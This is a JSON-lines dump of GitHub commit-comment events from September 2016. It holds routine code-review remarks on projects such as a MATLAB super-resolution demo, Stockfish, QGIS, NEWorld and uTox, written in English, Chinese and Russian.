{"id":"4513330307","type":"CommitCommentEvent","actor":{"login":"pliu007"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18892296,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-04T07:21:13Z","updated_at":"2016-09-04T07:21:13Z","body":"Hi zehao,\n\n你的VDSR caffe 代码 好像有些问题\n\nup_scale =3 是 报错。\n\n\n\n\n\nOn Thu, Sep 1, 2016 at 6:59 PM, Peng Liu <pliu007@fiu.edu> wrote:\n\n> Is  the attached code correct ?\n>\n>\n>\n>\n>\n> On Thu, Sep 1, 2016 at 4:13 AM, Maxsky <notifications@github.com> wrote:\n>\n>> Hi, you can check the implementation code of SRCNN. Use for loop and\n>> conv2 to implement convolution.\n>>\n>> 在 2016年9月1日，15:19，Peng Liu <notifications@github.com<mailto:\n>> notifications@github.com>> 写道：\n>>\n>> Hi,\n>>\n>> I am thinking if we can use matlab code only to test instead of\n>> MatconvNet.\n>>\n>> The attached file is my code. but it seems not working.\n>>\n>> could you check for me?\n>>\n>> On Wed, Aug 31, 2016 at 4:22 AM, Maxsky <notifications@github.com<mailto:\n>> notifications@github.com>> wrote:\n>>\n>> > Hi, check the new update of caffe-vdsr.\n>> >\n>> > ―\n>> > You are receiving this because you commented.\n>> > Reply to this email directly, view it on GitHub\n>> > <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20f\n>> acd4c3bf2baccfe993dceca251c55#commitcomment-18842873>,\n>> > or mute the thread\n>> > <https://github.com/notifications/unsubscribe-auth/\n>> AIZJ5TjvyWQukl5-o4PDNz5aB9ybeHYGks5qlTm-gaJpZM4JxO8i>\n>> > .\n>> >\n>>\n>> ―\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub<https://github.com/huan\n>> gzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca2\n>> 51c55#commitcomment-18859116>, or mute the thread<https://github.com/noti\n>> fications/unsubscribe-auth/ANB22m_tF_mMwv1nUVXav4A-k4IJi6\n>> axks5qlnx4gaJpZM4JxO8i>.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18859750>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AIZJ5SYtLxnIImHys9X7ERzZe3eGFqlrks5qloktgaJpZM4JxO8i>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-04T07:21:13Z"}
{"id":"4513333434","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18892298,"position":null,"line":null,"path":null,"commit_id":"e41bed97df41172bdfeeae82c92f13944cda3e1b","created_at":"2016-09-04T07:24:30Z","updated_at":"2016-09-04T07:24:30Z","body":"因为你把io_service和Server耦合到了一起（实际上毫无必要），所以Server删掉了很多代码，Session也砍掉了"}},"created_at":"2016-09-04T07:24:30Z"}
{"id":"4513334008","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18892299,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-04T07:25:05Z","updated_at":"2016-09-04T07:25:05Z","body":"没有用\r\n都不用asio了留着干什么"}},"created_at":"2016-09-04T07:25:05Z"}
{"id":"4513334246","type":"CommitCommentEvent","actor":{"login":"raoulh"},"repo":{"name":"calaos/calaos_base"},"payload":{"comment":{"id":18892300,"position":20,"line":29,"path":"src/bin/calaos_server/IO/AnalogIO.cpp","commit_id":"8d082f02f639f6cf4a20e8fb694ee62d75ac7287","created_at":"2016-09-04T07:25:21Z","updated_at":"2016-09-04T07:25:21Z","body":"\"other\" means default icon? Wouldn't be better to call it \"default\" then?"}},"created_at":"2016-09-04T07:25:21Z"}
{"id":"4513334393","type":"CommitCommentEvent","actor":{"login":"jacegu"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":18892301,"position":null,"line":null,"path":null,"commit_id":"012a90943770ecc4a9df47a36ac88654754c3e81","created_at":"2016-09-04T07:25:30Z","updated_at":"2016-09-04T07:25:30Z","body":"I would have wanted to introduce a regression spec for this one, but I couldn't find a way other than an integration test that actually performed the HTTP request."}},"created_at":"2016-09-04T07:25:30Z"}
{"id":"4513335040","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18892302,"position":33,"line":33,"path":"src/server/commandcontroller.h","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-04T07:26:11Z","updated_at":"2016-09-04T07:26:11Z","body":"可以给迭代器，但不能直接给表"}},"created_at":"2016-09-04T07:26:11Z"}
{"id":"4513335945","type":"CommitCommentEvent","actor":{"login":"zhuaizi"},"repo":{"name":"zhuaizi/SpringMvc"},"payload":{"comment":{"id":18892303,"position":2,"line":2,"path":"README.md","commit_id":"3ce0d746c82a9b91a0a19019dbd1c1f8b8923b75","created_at":"2016-09-04T07:27:02Z","updated_at":"2016-09-04T07:27:02Z","body":"menu\r\n"}},"created_at":"2016-09-04T07:27:02Z"}
{"id":"4513336159","type":"CommitCommentEvent","actor":{"login":"huangzehao"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18892304,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-04T07:27:13Z","updated_at":"2016-09-04T07:27:13Z","body":"因为重建后的图像大小与read进来的原始图像大小不相同，所以在计算PSNR时会报错。代码只是一个简单的演示demo，请根据自己的需要进行修改。另外有什么问题在对应的repository开一个issue进行提问。最好用英语，谢谢。"}},"created_at":"2016-09-04T07:27:13Z"}
{"id":"4513337932","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18892306,"position":33,"line":118,"path":"src/server/server.cpp","commit_id":"276dd8672901916a2336bd295d6117d79a31514e","created_at":"2016-09-04T07:29:03Z","updated_at":"2016-09-04T07:29:03Z","body":"Ratemeters是做什么的？里面的时间之间的运算符在gcc下不通过\r\n我在`feature-new-network`里先暂时把这部分注释掉，修复了再merge过去"}},"created_at":"2016-09-04T07:29:03Z"}
{"id":"4513338141","type":"CommitCommentEvent","actor":{"login":"epinapala"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18892307,"position":null,"line":null,"path":null,"commit_id":"c8c87c6ee698f61a73dae0bcf577b152368ec011","created_at":"2016-09-04T07:29:15Z","updated_at":"2016-09-04T07:29:15Z","body":":thumbsup: lgtm"}},"created_at":"2016-09-04T07:29:15Z"}
{"id":"4513338306","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18892308,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-04T07:29:23Z","updated_at":"2016-09-04T07:29:23Z","body":"My fork won't sync with the master, so there are some superfluous changes.\r\nStill some problems:\r\n![2016-09-04 09_00_26-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18229622/8c62cdcc-7280-11e6-8655-268f932edbc3.png)\r\n![2016-09-04 09_00_31-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18229624/8c67ec1c-7280-11e6-84f2-38a8be1b837f.png)\r\n![2016-09-04 09_02_02-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18229623/8c6340c2-7280-11e6-8e2f-6da912df2984.png)\r\nIf I enable 'Show colliding labels' I get an extra label, but where is the collision? It seems the collision is based on opposite sided labels.\r\nThe last screenshot shows the collision, when 'Line orientation' is unchecked.\r\nBut then there is an additional problem. One label is on the wrong side. Don't know (yet) where that comes from.\r\nI do know the code (algorithm) is pretty complex. Sigh."}},"created_at":"2016-09-04T07:29:23Z"}
{"id":"4513339576","type":"CommitCommentEvent","actor":{"login":"Pythonyte"},"repo":{"name":"Pythonyte/Algorithms-Archive"},"payload":{"comment":{"id":18892309,"position":null,"line":null,"path":null,"commit_id":"7a868074841263800add3aac81c920bcdb160f83","created_at":"2016-09-04T07:30:25Z","updated_at":"2016-09-04T07:30:25Z","body":"Note:\r\nAll these approaches belongs to Dynamic programming only . but with different approach.\r\n\r\ncoinchange: Recursion\r\nMemoized_coinchange : Recursion and Memoization\r\nDP_coinchanges : Bottom Up Approach"}},"created_at":"2016-09-04T07:30:25Z"}
{"id":"4513345741","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18892316,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-04T07:36:33Z","updated_at":"2016-09-04T07:36:33Z","body":"@nyalldawson Made a commit on my fork https://github.com/fritsvanveen/QGIS"}},"created_at":"2016-09-04T07:36:33Z"}
{"id":"4513346084","type":"CommitCommentEvent","actor":{"login":"Slegan"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892317,"position":145,"line":145,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T07:36:56Z","updated_at":"2016-09-04T07:36:56Z","body":"этот коментубразабыл, файлашел\r\n"}},"created_at":"2016-09-04T07:36:56Z"}
{"id":"4513346178","type":"CommitCommentEvent","actor":{"login":"clementleger"},"repo":{"name":"calaos/calaos_base"},"payload":{"comment":{"id":18892318,"position":20,"line":29,"path":"src/bin/calaos_server/IO/AnalogIO.cpp","commit_id":"8d082f02f639f6cf4a20e8fb694ee62d75ac7287","created_at":"2016-09-04T07:37:03Z","updated_at":"2016-09-04T07:37:03Z","body":"Indeed !  I will change it for default"}},"created_at":"2016-09-04T07:37:03Z"}
{"id":"4513347325","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18892321,"position":null,"line":null,"path":null,"commit_id":"ffe997752b006031cad9f838733d60b3eb070bcb","created_at":"2016-09-04T07:38:11Z","updated_at":"2016-09-04T07:38:11Z","body":"Good luck with your testing! :-)\r\n\r\nMaybe some \"stylistic\" remarks\r\n\r\na) I think I would prefer more readable variable names: `ourQueenSide`, `theirQueenSide`, `ourKingSide`, `theirKingSide`\r\n\r\nb) the case where we have more than four pawns on a one flank must be comparatively rarer, it is strange to handle 12 lines to handle this case, maybe it would be almost the same (Elo wise) to  simplify the logic to:\r\n\r\n````\r\nif (uQP > tQP)\r\n   score += Majority[std::min(uQP, 4)][std::min(tQP, 4)];\r\n   \r\nif (uKP > tKP)\r\n   score += Majority[std::min(uKP, 4)][std::min(uKP, 4)];\r\n````"}},"created_at":"2016-09-04T07:38:11Z"}
{"id":"4513347574","type":"CommitCommentEvent","actor":{"login":"tsudoko"},"repo":{"name":"uTox/uTox"},"payload":{"comment":{"id":18892322,"position":null,"line":null,"path":null,"commit_id":"e1dbcb0bd0f1e9e22ef21cf35a661e68e718d685","created_at":"2016-09-04T07:38:26Z","updated_at":"2016-09-04T07:38:26Z","body":"Doesn't that break backwards compatibility with existing custom themes (`utox_theme.ini`)?"}},"created_at":"2016-09-04T07:38:26Z"}
{"id":"4513347668","type":"CommitCommentEvent","actor":{"login":"Slegan"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892323,"position":15,"line":15,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T07:38:32Z","updated_at":"2016-09-04T07:38:32Z","body":"все эти файлы из папок грузятся, у меня все по папкам, я просто не разобрался как сюда папками грузить. "}},"created_at":"2016-09-04T07:38:32Z"}
{"id":"4513348119","type":"CommitCommentEvent","actor":{"login":"Slegan"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892324,"position":34,"line":34,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T07:39:00Z","updated_at":"2016-09-04T07:39:00Z","body":"да, об этом я не подумл(\r\n"}},"created_at":"2016-09-04T07:39:00Z"}
{"id":"4513348737","type":"CommitCommentEvent","actor":{"login":"Slegan"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892325,"position":141,"line":141,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T07:39:34Z","updated_at":"2016-09-04T07:39:34Z","body":"так в примере бустрепа везде подгружается, как лутше делать?\r\n"}},"created_at":"2016-09-04T07:39:34Z"}
{"id":"4513349945","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"sindresorhus/del"},"payload":{"comment":{"id":18892326,"position":null,"line":null,"path":null,"commit_id":"c5dbf30431713dcbc38e9b13e251ed08655f32a2","created_at":"2016-09-04T07:40:41Z","updated_at":"2016-09-04T07:40:41Z","body":"My buds have joked that I should have ads on lodash's post-install since it's downloaded 2 billion+ times :P"}},"created_at":"2016-09-04T07:40:41Z"}
{"id":"4513350317","type":"CommitCommentEvent","actor":{"login":"pliu007"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18892327,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-04T07:41:05Z","updated_at":"2016-09-04T07:41:05Z","body":"sure.\r\n\r\nBut why is the up-scale 2 working ?\r\n\r\nBy the way , why did not it run test on one ariginal image instead of two\r\ndifferent size same images ?\r\n\r\nActually, I have already changed this demo to use one image for test. The\r\nproblem is different scale can result different performance. If scale is 3\r\n, the test results could worse than bicubic. Maybe it is due to my own data\r\nissue. But maybe you should check a little bit.\r\n\r\nThanks.  I will open an issue for further\r\n\r\n2016年9月4日星期日，Maxsky <notifications@github.com> 写道：\r\n\r\n> 因为重建后的图像大小与read进来的原始图像大小不相同，所以在计算PSNR时会报错。代码只是一个简单的演示demo，请根据自己的需要进行修改。\r\n> 另外有什么问题在对应的repository开一个issue进行提问。最好用英语，谢谢。\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18892304>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AIZJ5aVvD-Mc7H1PkEz5cqUmHPX-5X_Mks5qmnLSgaJpZM4JxO8i>\r\n> .\r\n>\r\n\r\n\r\n-- \r\nThanks & Regards.\r\nPeng Liu.\r\n"}},"created_at":"2016-09-04T07:41:05Z"}
{"id":"4513350484","type":"CommitCommentEvent","actor":{"login":"detlefziehlke"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18892328,"position":null,"line":null,"path":null,"commit_id":"f286c1c798a1c9bbd46f8ea79282d3d2e76af30f","created_at":"2016-09-04T07:41:13Z","updated_at":"2016-09-04T07:41:13Z","body":"Great! But the normal npm install -g angular-cli still installs a version, that creates a rc.4 project.\r\nDetlef"}},"created_at":"2016-09-04T07:41:13Z"}
{"id":"4513350601","type":"CommitCommentEvent","actor":{"login":"anik-cf"},"repo":{"name":"anik-cf/basic-contact-form-plugin-wordpress"},"payload":{"comment":{"id":18892329,"position":null,"line":null,"path":null,"commit_id":"44748164491665c65b25df21dad3a9f2c60ca91a","created_at":"2016-09-04T07:41:20Z","updated_at":"2016-09-04T07:41:20Z","body":"Main plugin file. Make your required changes here. "}},"created_at":"2016-09-04T07:41:20Z"}
{"id":"4513352943","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18892332,"position":5,"line":3,"path":"app/models/job_category.rb","commit_id":"c9ac10db2b864cbb7c9500ed16f340f4f77a43b0","created_at":"2016-09-04T07:43:35Z","updated_at":"2016-09-04T07:43:35Z","body":"will workers ever not be unique? A worker can't have the same job category twice right?"}},"created_at":"2016-09-04T07:43:35Z"}
{"id":"4513356605","type":"CommitCommentEvent","actor":{"login":"rtfeldman"},"repo":{"name":"elm-community/elm-test"},"payload":{"comment":{"id":18892335,"position":null,"line":null,"path":null,"commit_id":"189956661b25ca6b89ecc920b30f55f28ce674cd","created_at":"2016-09-04T07:46:47Z","updated_at":"2016-09-04T07:46:47Z","body":"This seems 👍  although based on https://github.com/elm-community/elm-test/issues/50 I'm inclined to remove this in favor of fixing `Fuzz.string` 😄 "}},"created_at":"2016-09-04T07:46:47Z"}
{"id":"4513357824","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18892336,"position":17,"line":15,"path":"app/models/worker.rb","commit_id":"c9ac10db2b864cbb7c9500ed16f340f4f77a43b0","created_at":"2016-09-04T07:48:00Z","updated_at":"2016-09-04T07:48:00Z","body":"this should remain a protected method right?"}},"created_at":"2016-09-04T07:48:00Z"}
{"id":"4513360637","type":"CommitCommentEvent","actor":{"login":"mgold"},"repo":{"name":"elm-community/elm-test"},"payload":{"comment":{"id":18892339,"position":null,"line":null,"path":null,"commit_id":"189956661b25ca6b89ecc920b30f55f28ce674cd","created_at":"2016-09-04T07:50:45Z","updated_at":"2016-09-04T07:50:45Z","body":"Sure, it does seem like `filter` would work if someone really didn't want really long or really short strings."}},"created_at":"2016-09-04T07:50:45Z"}
{"id":"4513363218","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"Fsu0413/QSanguosha-For-Hegemony-V2-Rule"},"payload":{"comment":{"id":18892344,"position":34,"line":34,"path":"General/standard/wei/simy.md","commit_id":"51889dcb70cfbb4347b3db5e98a2e3c7608d6b17","created_at":"2016-09-04T07:53:21Z","updated_at":"2016-09-04T07:53:21Z","body":"消耗：你打出一张手牌"}},"created_at":"2016-09-04T07:53:21Z"}
{"id":"4513363602","type":"CommitCommentEvent","actor":{"login":"KreAch3R"},"repo":{"name":"krexus-caf/system_core"},"payload":{"comment":{"id":18892346,"position":null,"line":null,"path":null,"commit_id":"95ad4957eaf348c5b0f825e88ffb8642ca0f4770","created_at":"2016-09-04T07:53:45Z","updated_at":"2016-09-04T07:53:45Z","body":"Hey @quesoo \r\n\r\nThank you for the kind words. Your best bet is to contact @Meninblack007 directly, he's helping us and he's the guy behind AOSP-CAF!\r\n\r\n:)"}},"created_at":"2016-09-04T07:53:45Z"}
{"id":"4513364304","type":"CommitCommentEvent","actor":{"login":"huangzehao"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18892349,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-04T07:54:30Z","updated_at":"2016-09-04T07:54:30Z","body":"Hi, check the size of im_l and im_gt and you will understand the reason.\r\nim_l = imread('./data/slena.bmp');\r\nim_gt = imread('./data/mlena.bmp');\r\n\r\nYou can read a high-resolution image and downsample it into a low-resolution one for testing, like this:\r\nim_gt = imread('./data/mlena.bmp');\r\nup_factor = 3;\r\nim_l = imresize(im_gt,1/up_factor,'bicubic');\r\n\r\nThis is the general way to test the performance of super-resolution method."}},"created_at":"2016-09-04T07:54:30Z"}
{"id":"4513364444","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18892350,"position":1,"line":1,"path":"app/views/workers/shared/_onboard_links.html.erb","commit_id":"c9ac10db2b864cbb7c9500ed16f340f4f77a43b0","created_at":"2016-09-04T07:54:41Z","updated_at":"2016-09-04T07:54:41Z","body":"can remove this\r\n"}},"created_at":"2016-09-04T07:54:41Z"}
{"id":"4513364681","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18892351,"position":19,"line":19,"path":"app/views/workers/shared/_onboard_links.html.erb","commit_id":"c9ac10db2b864cbb7c9500ed16f340f4f77a43b0","created_at":"2016-09-04T07:54:53Z","updated_at":"2016-09-04T07:54:53Z","body":"worker_dashboard_path"}},"created_at":"2016-09-04T07:54:53Z"}
{"id":"4513366318","type":"CommitCommentEvent","actor":{"login":"yinshengkui"},"repo":{"name":"yinshengkui/caicaicai"},"payload":{"comment":{"id":18892354,"position":2,"line":2,"path":"2016.9.3-1.cpp","commit_id":"6ecea12f0448dd18d381e3bb99719e3232336f1b","created_at":"2016-09-04T07:56:25Z","updated_at":"2016-09-04T07:56:25Z","body":"消消乐"}},"created_at":"2016-09-04T07:56:25Z"}
{"id":"4513369245","type":"CommitCommentEvent","actor":{"login":"GrayHatter"},"repo":{"name":"uTox/uTox"},"payload":{"comment":{"id":18892355,"position":null,"line":null,"path":null,"commit_id":"e1dbcb0bd0f1e9e22ef21cf35a661e68e718d685","created_at":"2016-09-04T07:59:13Z","updated_at":"2016-09-04T07:59:13Z","body":"@tsudoko, probably\n\nOn Sun, Sep 4, 2016 at 12:38 AM, tsudoko <notifications@github.com> wrote:\n\n> Doesn't that break backwards compatibility with existing custom themes (\n> utox_theme.ini)?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uTox/uTox/commit/e1dbcb0bd0f1e9e22ef21cf35a661e68e718d685#commitcomment-18892322>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAO20J_rd0cpvAbqeLcnRNT2tU0hELrNks5qmnVygaJpZM4J0en2>\n> .\n>\n"}},"created_at":"2016-09-04T07:59:13Z"}
{"id":"4513370884","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18892357,"position":5,"line":340,"path":"src/types.h","commit_id":"ca6c9f85a5c3a45a248716b8fe68821b20eee201","created_at":"2016-09-04T08:00:32Z","updated_at":"2016-09-04T08:00:32Z","body":"This would deserve a comment:\r\n````\r\n   return Piece(pc ^ 8);  // Swap color of piece\r\n````"}},"created_at":"2016-09-04T08:00:32Z"}
{"id":"4513371051","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/acessibilidade-web-pt"},"payload":{"comment":{"id":18892358,"position":null,"line":null,"path":null,"commit_id":"f96b2b054624cc497334a53766293accedb8befe","created_at":"2016-09-04T08:00:41Z","updated_at":"2016-09-04T08:00:41Z","body":"webiwg/webiwg-issues#9"}},"created_at":"2016-09-04T08:00:41Z"}
{"id":"4513372888","type":"CommitCommentEvent","actor":{"login":"pliu007"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18892359,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-04T08:01:55Z","updated_at":"2016-09-04T08:01:55Z","body":"Got it.  Thanks.\n\n2016年9月4日星期日，Maxsky <notifications@github.com> 写道：\n\n> Hi, check the size of im_l and im_gt and you will understand the reason.\n> im_l = imread('./data/slena.bmp');\n> im_gt = imread('./data/mlena.bmp');\n>\n> You can read a high-resolution image and downsample it into a\n> low-resolution one for testing, like this:\n> im_gt = imread('./data/mlena.bmp');\n> up_factor = 3;\n> im_l = imresize(im_gt,1/up_factor,'bicubic');\n>\n> This is the general way to test the performance of super-resolution method.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18892349>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIZJ5a1jV6hqFHC5LLV3_wZWxMAEv9Wwks5qmnk3gaJpZM4JxO8i>\n> .\n>\n\n\n-- \nThanks & Regards.\nPeng Liu.\n"}},"created_at":"2016-09-04T08:01:55Z"}
{"id":"4513373545","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"krexus-caf/system_core"},"payload":{"comment":{"id":18892361,"position":null,"line":null,"path":null,"commit_id":"95ad4957eaf348c5b0f825e88ffb8642ca0f4770","created_at":"2016-09-04T08:02:25Z","updated_at":"2016-09-04T08:02:25Z","body":"Hi bro. Thanks for response.\r\n\r\nI already contacted him. He Does not know\r\n\r\nhttps://github.com/AOSP-CAF/platform_manifest/commit/ed629ab2228e66791a258953ff75f970e915df5d\r\n"}},"created_at":"2016-09-04T08:02:25Z"}
{"id":"4513374331","type":"CommitCommentEvent","actor":{"login":"igas"},"repo":{"name":"lahavit/projects"},"payload":{"comment":{"id":18892363,"position":15,"line":15,"path":"app/controllers/projects_controller.rb","commit_id":"c0e03e5ec539c2ea81bc2d2b3b9d848905b1bcfa","created_at":"2016-09-04T08:02:58Z","updated_at":"2016-09-04T08:02:58Z","body":"You don't need to find it manually, coz you defined relationships in the model you can just use `@project.issues`"}},"created_at":"2016-09-04T08:02:58Z"}
{"id":"4513377554","type":"CommitCommentEvent","actor":{"login":"wattazoum"},"repo":{"name":"bsorrentino/maven-confluence-plugin"},"payload":{"comment":{"id":18892366,"position":null,"line":null,"path":null,"commit_id":"a0bbd9dc835659f99cf1eab6564804746310017f","created_at":"2016-09-04T08:05:19Z","updated_at":"2016-09-04T08:05:19Z","body":"By the way, this fixes #122 "}},"created_at":"2016-09-04T08:05:19Z"}
{"id":"4513377971","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18892370,"position":5,"line":340,"path":"src/types.h","commit_id":"ca6c9f85a5c3a45a248716b8fe68821b20eee201","created_at":"2016-09-04T08:05:38Z","updated_at":"2016-09-04T08:05:38Z","body":"Ok, I will add it with the next patch"}},"created_at":"2016-09-04T08:05:38Z"}
{"id":"4513379286","type":"CommitCommentEvent","actor":{"login":"takumi918"},"repo":{"name":"takumi918/revolution"},"payload":{"comment":{"id":18892378,"position":3,"line":3,"path":"index2.html","commit_id":"69ce627e35b79893c03e9ad8c6db7fc7cfcd1a8d","created_at":"2016-09-04T08:06:35Z","updated_at":"2016-09-04T08:06:35Z","body":"test"}},"created_at":"2016-09-04T08:06:35Z"}
{"id":"4513385427","type":"CommitCommentEvent","actor":{"login":"mjgil"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":18892385,"position":5,"line":237,"path":"system/mount.py","commit_id":"5f1d6ded7faae2d501e851094834b0581b2dac37","created_at":"2016-09-04T08:10:59Z","updated_at":"2016-09-04T08:10:59Z","body":"this fails for me on Ubuntu 14.04"}},"created_at":"2016-09-04T08:10:59Z"}
{"id":"4513386993","type":"CommitCommentEvent","actor":{"login":"pjlsergeant"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18892387,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-04T08:12:06Z","updated_at":"2016-09-04T08:12:06Z","body":"Could you show me an invocation where you tried parallelization?"}},"created_at":"2016-09-04T08:12:06Z"}
{"id":"4513388874","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18892390,"position":null,"line":null,"path":null,"commit_id":"480f1e4f1457bf2b4e4d46ff9cbc7bb1580695ae","created_at":"2016-09-04T08:13:22Z","updated_at":"2016-09-04T08:13:22Z","body":"Here is the snippet of relevant material configurations.\r\n```\r\n330  12112\r\n331  12185\r\n332  12260\r\n333  12317\r\n334  12333\r\n335  12390\r\n```\r\nAs you can see, >= 12222 effectively means >= 12260. I simply picked the next bigger number.\r\nBut don't ask me for the exact material configuration. ;-)"}},"created_at":"2016-09-04T08:13:22Z"}
{"id":"4513389098","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18892391,"position":7,"line":95,"path":"backend/globaleaks/handlers/admin/overview.py","commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T08:13:31Z","updated_at":"2016-09-04T08:13:31Z","body":"@NSkelsey: finally found the way in in Storm to do JOINs"}},"created_at":"2016-09-04T08:13:31Z"}
{"id":"4513390153","type":"CommitCommentEvent","actor":{"login":"kularny"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18892393,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T08:14:29Z","updated_at":"2016-09-04T08:14:29Z","body":"Lol...here is the original commit that I modified & made long back :-p\r\n\r\nhttps://github.com/kularny/android_vendor_du/commit/7180fec7ed607ea1077cd6c83b23a8f0abdca6e0"}},"created_at":"2016-09-04T08:14:29Z"}
{"id":"4513391191","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18892396,"position":37,"line":202,"path":"backend/globaleaks/db/sqlite.sql","commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T08:15:34Z","updated_at":"2016-09-04T08:15:34Z","body":"@NSkelsey: 1 table less, 2redundant references less, and more joy."}},"created_at":"2016-09-04T08:15:34Z"}
